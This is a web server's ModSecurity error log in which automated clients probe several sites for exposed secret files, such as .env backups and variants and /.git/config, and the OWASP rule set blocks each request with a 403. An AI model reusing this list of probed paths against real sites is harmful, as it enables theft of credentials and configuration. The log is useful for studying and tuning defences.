[Mon May 11 12:13:56.559184 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:50152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /play/.env.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/play/.env.archived"] [unique_id "agGr5BjZymfuKpjWXeiE5AAAAM8"]
[Mon May 11 12:13:56.559700 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:50152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/play/.env.archived"] [unique_id "agGr5BjZymfuKpjWXeiE5AAAAM8"]
[Mon May 11 12:13:57.769719 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:50152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGr5BjZymfuKpjWXeiE5AAAAM8"]
[Mon May 11 12:13:59.237751 2026] [authz_core:error] [pid 1254133:tid 1254149] [client 95.111.239.37:60114] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 12:14:20.893104 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:11676] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postman/.env.backup2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/postman/.env.backup2024"] [unique_id "agGr_EYQeUtAPynIs6xg6AAAAAk"]
[Mon May 11 12:14:20.893729 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:11676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/postman/.env.backup2024"] [unique_id "agGr_EYQeUtAPynIs6xg6AAAAAk"]
[Mon May 11 12:14:22.073874 2026] [security2:error] [pid 1254212:tid 1254223] [client 185.177.72.9:11676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGr_EYQeUtAPynIs6xg6AAAAAk"]
[Mon May 11 12:14:22.100885 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:11684] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postman/.env.backup2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/postman/.env.backup2024"] [unique_id "agGr_hjZymfuKpjWXeiFDQAAAMQ"]
[Mon May 11 12:14:22.101304 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:11684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/postman/.env.backup2024"] [unique_id "agGr_hjZymfuKpjWXeiFDQAAAMQ"]
[Mon May 11 12:14:23.309338 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:11684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGr_hjZymfuKpjWXeiFDQAAAMQ"]
[Mon May 11 12:14:23.336618 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:30736] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postman/.env.prod.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/postman/.env.prod.archived"] [unique_id "agGr_0Rdw2n9wv6Ai48PlwAAAIs"]
[Mon May 11 12:14:23.340306 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:30736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/postman/.env.prod.archived"] [unique_id "agGr_0Rdw2n9wv6Ai48PlwAAAIs"]
[Mon May 11 12:14:24.503713 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:30736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGr_0Rdw2n9wv6Ai48PlwAAAIs"]
[Mon May 11 12:14:24.529711 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:30752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postman/.env.prod.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/postman/.env.prod.archived"] [unique_id "agGsAERdw2n9wv6Ai48PmQAAAIU"]
[Mon May 11 12:14:24.529925 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:30752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/postman/.env.prod.archived"] [unique_id "agGsAERdw2n9wv6Ai48PmQAAAIU"]
[Mon May 11 12:14:25.758822 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:30752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsAERdw2n9wv6Ai48PmQAAAIU"]
[Mon May 11 12:14:30.685693 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 46.22.0.193:62156] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/plugins/instagram-feed/inc/admin/error_log
[Mon May 11 12:14:48.148789 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:22540] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /protractor/.env.dev.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/protractor/.env.dev.disabled"] [unique_id "agGsGERdw2n9wv6Ai48PxgAAAIw"]
[Mon May 11 12:14:48.149452 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:22540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/protractor/.env.dev.disabled"] [unique_id "agGsGERdw2n9wv6Ai48PxgAAAIw"]
[Mon May 11 12:14:49.388256 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:22540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsGERdw2n9wv6Ai48PxgAAAIw"]
[Mon May 11 12:14:49.651922 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:22554] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /protractor/.env.dev.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/protractor/.env.dev.disabled"] [unique_id "agGsGWS6k_SCYd1AVZq3IwAAAQs"]
[Mon May 11 12:14:49.652312 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:22554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/protractor/.env.dev.disabled"] [unique_id "agGsGWS6k_SCYd1AVZq3IwAAAQs"]
[Mon May 11 12:14:51.101060 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:22554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsGWS6k_SCYd1AVZq3IwAAAQs"]
[Mon May 11 12:14:51.128587 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:22564] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /protractor/.env.development.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/protractor/.env.development.draft"] [unique_id "agGsG0Rdw2n9wv6Ai48PzQAAAII"]
[Mon May 11 12:14:51.129504 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:22564] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/protractor/.env.development.draft"] [unique_id "agGsG0Rdw2n9wv6Ai48PzQAAAII"]
[Mon May 11 12:14:52.332099 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:22564] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsG0Rdw2n9wv6Ai48PzQAAAII"]
[Mon May 11 12:14:52.358850 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:22574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /protractor/.env.development.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/protractor/.env.development.draft"] [unique_id "agGsHERdw2n9wv6Ai48PzwAAAJc"]
[Mon May 11 12:14:52.359047 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:22574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/protractor/.env.development.draft"] [unique_id "agGsHERdw2n9wv6Ai48PzwAAAJc"]
[Mon May 11 12:14:53.574248 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:22574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsHERdw2n9wv6Ai48PzwAAAJc"]
[Mon May 11 12:14:58.457260 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:54076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /python/.env.dist.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/python/.env.dist.template"] [unique_id "agGsImS6k_SCYd1AVZq3LAAAARY"]
[Mon May 11 12:14:58.457594 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:54076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/python/.env.dist.template"] [unique_id "agGsImS6k_SCYd1AVZq3LAAAARY"]
[Mon May 11 12:14:59.623653 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:54076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsImS6k_SCYd1AVZq3LAAAARY"]
[Mon May 11 12:14:59.649203 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:54084] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /python/.env.dist.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/python/.env.dist.template"] [unique_id "agGsI2S6k_SCYd1AVZq3LQAAAQk"]
[Mon May 11 12:14:59.649573 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:54084] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/python/.env.dist.template"] [unique_id "agGsI2S6k_SCYd1AVZq3LQAAAQk"]
[Mon May 11 12:15:00.893368 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:54084] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsI2S6k_SCYd1AVZq3LQAAAQk"]
[Mon May 11 12:15:05.338278 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.213.174.51:41210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agGsKZkIEwRJMyDaV55WqQAAAVI"]
[Mon May 11 12:15:05.338290 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.213.174.51:41172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agGsKWS6k_SCYd1AVZq3MgAAAQo"]
[Mon May 11 12:15:05.338497 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.213.174.51:41172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agGsKWS6k_SCYd1AVZq3MgAAAQo"]
[Mon May 11 12:15:05.338506 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.213.174.51:41210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agGsKZkIEwRJMyDaV55WqQAAAVI"]
[Mon May 11 12:15:05.338683 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.213.174.51:41094] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agGsKb4KNmD_mZ_vlf9BUwAAAEk"]
